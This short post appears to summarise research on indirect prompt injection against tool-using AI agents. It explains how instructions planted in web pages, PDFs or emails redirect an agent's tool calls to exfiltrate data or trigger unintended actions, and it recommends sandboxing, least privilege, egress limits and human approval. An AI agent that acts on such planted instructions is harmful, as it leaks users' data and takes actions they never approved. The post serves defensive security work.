Researchers demonstrate indirect prompt injection that hijacks tool-using AI agents
A new write-up shows how a poisoned web page or document can silently redirect an autonomous agent's tool calls — exfiltrating data or triggering unintended actions — without the user noticing.
This is the threat model for anything agentic — including build-and-deploy pipelines. The mitigation isn't a better prompt; it's least-privilege tools, egress control, and a human gate before consequential actions. Exactly why our build agents run sandboxed.
Indirect prompt injection embeds adversarial instructions in content the agent reads (a page, a PDF, an email), which the model then treats as trusted input and acts on.
Because the malicious instruction rides in data rather than the user's prompt, traditional input validation misses it. The blast radius is whatever tools and credentials the agent holds.
Defenses that actually work are architectural: scope each tool to least privilege, sandbox execution, restrict network egress, and require human approval before anything irreversible or public. Treat the model as an untrusted component in the system.